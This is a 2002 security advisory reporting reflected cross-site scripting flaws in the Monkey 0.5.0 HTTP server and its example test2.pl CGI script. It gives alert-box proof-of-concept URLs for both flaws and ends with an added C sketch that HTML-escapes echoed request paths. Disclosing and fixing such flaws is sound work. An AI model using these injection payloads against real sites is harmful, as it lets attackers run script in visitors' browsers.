XSS bug in Monkey (0.5.0) HTTP server

From: DownBload (downbloadat_private)
Date: Mon Sep 30 2002 - 05:27:40 PDT

    	           [ Illegal Instruction Labs Advisory ]
    [-------------------------------------------------------------------------]
    Advisory name: XSS bug in Monkey (0.5.0) HTTP server
    Advisory number: 14
    Application: Monkey (0.5.0) HTTP server
    Application author: Eduardo Silva (EdsipeR)
    Author e-mail: edsiper@linux-chile.org
    Monkey Project: http://monkeyd.sourceforge.net
    Date: 29.09.2002
    Impact: XSS code execution
    Tested on: Debian 2.1 (2.0.36 kernel)
    Discovered by: DownBload						
    Mail me @: downbloadat_private	
    
    
    
    
    ======[ Overview 
    Monkey is a very simple and fast HTTP server (daemon).
    
    
    
    
    ======[ Problems
    1.) Monkey is vulnerable to XSS.
    ---cut here---
    www.victim.com/<script>alert('IIL_0wnZ_YoU!!!');</script>
    ---cut here---
    
    2.) There is also an XSS bug in the test2.pl CGI script (an example script)
    which comes with Monkey 0.5.0.
    ---cut here---
    www.victim.com/cgi-bin/test2.pl?<script>alert('IIL_0wnZ_YoU!!!');</script>
    ---cut here---
    
    
    
    
    ======[ Greetz 
    Greetz goes to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>. 
    Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
    Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org 
    (NetZero & Paradox).
    I'm very sorry if I forgot someone.
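
Added example, not part of the advisory and not Monkey's own code: a server-side mitigation for both problems above is to HTML-encode any request-derived string before writing it into a response body. The sketch assumes the requested path is reflected in a 404 page (the advisory does not say which response echoes it); `html_escape` and `build_not_found` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* HTML-escape `in` into `out` (capacity outsz, NUL-terminated on success).
 * Returns bytes written, or -1 (with out emptied) if the result does not fit. */
static int html_escape(const char *in, char *out, size_t outsz)
{
    size_t used = 0;
    if (outsz == 0) return -1;
    for (; *in; in++) {
        const char *rep;
        char one[2] = { *in, '\0' };
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (used + n >= outsz) { out[0] = '\0'; return -1; } /* fail closed */
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return (int)used;
}

/* Hypothetical 404 body builder: the path is echoed only after escaping. */
static int build_not_found(const char *uri, char *page, size_t pagesz)
{
    char safe[1024];
    if (html_escape(uri, safe, sizeof safe) < 0)
        return -1; /* caller should send a generic page without the path */
    int n = snprintf(page, pagesz,
        "<html><body><h1>404 Not Found</h1><p>%s</p></body></html>", safe);
    return (n < 0 || (size_t)n >= pagesz) ? -1 : n;
}

int main(void)
{
    char page[2048];
    /* Request path from the advisory's first test case. */
    if (build_not_found("/<script>alert('IIL_0wnZ_YoU!!!');</script>",
                        page, sizeof page) > 0)
        puts(page);
    return 0;
}
```

The same encoding step applies to the query string that test2.pl prints, using an equivalent routine in Perl.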
    


